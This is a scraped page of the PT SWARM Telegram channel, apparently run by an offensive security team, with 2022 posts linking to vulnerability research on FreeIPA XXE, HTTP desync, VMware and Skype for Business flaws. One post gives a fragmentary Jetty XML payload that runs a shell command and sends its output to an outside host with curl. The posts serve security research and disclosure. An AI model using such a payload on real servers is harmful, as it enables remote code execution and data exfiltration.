PT SWARM

Channel address: @ptswarm
Categories: Technologies
Language: English
Subscribers: 2.98K
Description from channel

Positive Technologies Offensive Team: twitter.com/ptswarm
This is the channel where we share articles/vulnerabilities/scripts/etc, not necessarily authored by us, that we find interesting

The latest Messages

2022-08-31 15:46:13
You discovered an XSS, but it has no impact?

Our mobile hacker @impact_l knows how to make it work!
2022-08-18 16:12:53
FreeIPA fixed XXE (CVE-2022-2414) found by our researcher @elk0kc.

In some cases, it allows attackers to read the Directory Manager password from configs of FreeIPA and take full control of the infrastructure. May or may not require auth.

Advisory: https://access.redhat.com/security/cve/CVE-2022-2414
2022-08-15 13:57:11
A set of Jiggler Keys is the most practical tool for a penetration tester when operating on-site!

Jiggle your way into any cabinet in a matter of seconds!
2022-08-11 12:02:40
Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling

by James Kettle

In this paper, the researcher shows how to turn a victim's web browser into a desync delivery platform, shifting the request smuggling frontier by exposing single-server websites and internal networks. The article describes how to combine cross-domain requests with server flaws to poison browser connection pools, install backdoors, and release desync worms. With these techniques, the author compromises targets including Apache, Akamai, Varnish, Amazon, and multiple web VPNs.

Contents:
• HTTP handling anomalies
•• Connection state attacks
•• The surprise factor
•• Detecting connection-locked CL.TE
•• Browser-compatible CL.0
•• H2.0 on amazon.com
• Client-side desync
•• Methodology
•• Akamai stacked-HEAD
•• Cisco VPN client-side cache poisoning
•• Verisign fragmented chunk
•• Pulse Secure VPN
• Pause-based desync
•• Server-side
•• MITM-powered
• Conclusion
•• Further research
•• Defence
•• Summary

https://portswigger.net/research/browser-powered-desync-attacks
2022-08-10 14:42:57
Dancing on the architecture of VMware Workspace ONE Access

by Petrus Viet

Technical analysis of two vulnerabilities, CVE-2022-31656 and CVE-2022-31659, affecting VMware Workspace ONE Access, Identity Manager, and vRealize Automation.

Contents:
• Java web architecture
• [CVE-2022-31656] Bypass Authentication
• [CVE-2022-31659] Admin RCE

https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
2022-08-09 14:39:43
Our researcher Arseniy Sharoglazov found a new technique for discovering second-level domains!

Useful for:
• Bug hunters, for discovering vulns on new domains
• Threat hunters, for discovering malicious domains
• Everyone else

Read the research: https://swarm.ptsecurity.com/discovering-domains-via-timing-attack/
2022-08-04 16:33:38
A tip for getting RCE in Jetty apps with just one XML file!

upd: RCE.xml








/bin/sh
-c
curl -F "r=`id`" http://PTSWARM.local:1337/




2022-08-02 11:53:04
New article by our researcher Aleksey Solovev: "Researching Open Source apps for XSS to RCE flaws".

Read the article:
https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/
2022-07-20 18:37:04
We have reproduced an Arbitrary File Read for an internal site of Skype for Business / MS Lync!

CVE: CVE-2022-26911
Subdomains: dialin, meet, lyncdiscover, sip, ...

Original advisory: https://lab.viettelcybersecurity.com/advisories/VCSA-97

The PoC
2022-07-14 17:01:25
New attack!
Our researcher Arseniy Sharoglazov discovered a PHP Arbitrary Object Instantiation with no user-defined classes. It was turned into RCE!

https://twitter.com/ptswarm/status/1547574555153092613